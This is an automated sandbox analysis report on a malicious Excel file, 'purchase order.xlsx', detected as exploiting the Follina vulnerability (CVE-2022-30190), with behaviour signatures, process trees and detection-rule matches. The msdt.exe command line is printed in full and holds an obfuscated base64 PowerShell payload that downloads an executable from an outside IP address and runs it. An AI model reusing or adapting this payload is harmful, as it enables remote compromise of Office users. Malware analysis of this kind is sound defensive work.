Edit tour
Windows
Analysis Report
purchase order.xlsx
Overview
General Information
Detection
Follina CVE-2022-30190
Score: | 68 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Document exploit detected (process start blacklist hit)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Yara signature match
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Drops PE files to the windows directory (C:\Windows)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP
Classification
- System is w10x64
- EXCEL.EXE (PID: 1388 cmdline:
"C:\Progra m Files (x 86)\Micros oft Office \Office16\ EXCEL.EXE" /automati on -Embedd ing MD5: 5D6638F2C8F8571C593999C58866007E) - msdt.exe (PID: 6596 cmdline:
C:\Windows \system32\ msdt.exe" ms-msdt:/i d pcWdiAGN OsTIc -ski P FOrCE /P ArAM "It_r EBrowSefor FILe=#AIT IT_LaunchM ethod=Cont extMenu IT _BrowseFor File=4yt$( IEx($(IEX( '[SysTEm.T Ext.eNCodI ng]'+[CHar ]58+[CHAr] 58+'UTF8.G eTStRIng([ SYstEm.cON veRT]'+[Ch ar]58+[cHA R]58+'FROM BAsE64stRi Ng('+[cHaR ]34+'U1Rvc C1wck9jZVN TIC1Gb3JDZ SAtbkFtZSA nbXNkdCc7J FdaID0gYWR kLVR5cEUgL W1FbWJlcmR FZmluSXRJT 04gJ1tEbGx JbXBvcnQoI nVyTE1vTi5 kbEwiLCBDa GFyU2V0ID0 gQ2hhclNld C5Vbmljb2R lKV1wdWJsa WMgc3RhdGl jIGV4dGVyb iBJbnRQdHI gVVJMRG93b mxvYWRUb0Z pbGUoSW50U HRyIEtXTCx zdHJpbmcgc Essc3RyaW5 nIGp0Ryx1a W50IEV3LEl udFB0ciB6Y mcpOycgLU5 hbWUgIlFXY iIgLU5hTWV TUGFjZSBtc yAtUGFzc1R ocnU7ICRXW jo6VVJMRG9 3bmxvYWRUb 0ZpbGUoMCw iaHR0cDovL zE3Mi4yNDU uMTE5LjQ4L zg3MC92YmM uZXhlIiwiJ GVOdjpQVUJ MSUNcdmJjL mV4ZSIsMCw wKTtzdEFyV C1zTGVFUCg zKTtyVW5kb EwzMi5lWEU gemlwZmxkc i5kbGwsUm9 1dGVUaGVDY WxsICIkRW5 2OlBVQkxJQ 1x2YmMuZXh lIjtTdG9QL VByb2NFU3M gLUZPcmNFI C1uYW1FICd zZGlhZ25ob 3N0Jw=='+[ cHAr]34+') )'))))ej/. ./../../.. /../../../ ../../../. ./../.Msi MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
- csc.exe (PID: 2436 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\csc. exe" /noco nfig /full paths @"C: \Users\use r\AppData\ Local\Temp \byhngmvt\ byhngmvt.c mdline MD5: 350C52F71BDED7B99668585C15D70EEA) - cvtres.exe (PID: 2320 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE SF139.tmp" "c:\Users \user\AppD ata\Local\ Temp\byhng mvt\CSC32F 0A3FBBAE24 50F8C7268C 7C3F4F6C.T MP" MD5: C09985AE74F0882F208D75DE27770DFA)
- csc.exe (PID: 6112 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\csc. exe" /noco nfig /full paths @"C: \Users\use r\AppData\ Local\Temp \1fyof3jw\ 1fyof3jw.c mdline MD5: 350C52F71BDED7B99668585C15D70EEA) - cvtres.exe (PID: 5636 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S13B6.tmp" "c:\Users \user\AppD ata\Local\ Temp\1fyof 3jw\CSCCF4 0F4DDD1534 C9CB221F9F D50B8FC59. TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
- csc.exe (PID: 6460 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\csc. exe" /noco nfig /full paths @"C: \Users\use r\AppData\ Local\Temp \1cq1zudv\ 1cq1zudv.c mdline MD5: 350C52F71BDED7B99668585C15D70EEA)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard |
| |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation | Nasreddine Bencherchali, Christian Burkard |
| |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
Click to see the 1 entries |
⊘No Sigma rule has matched
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | ReversingLabs: |
Exploits |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | File opened: |
Software Vulnerabilities |
---|
Source: | Process created: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | Memory has grown: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |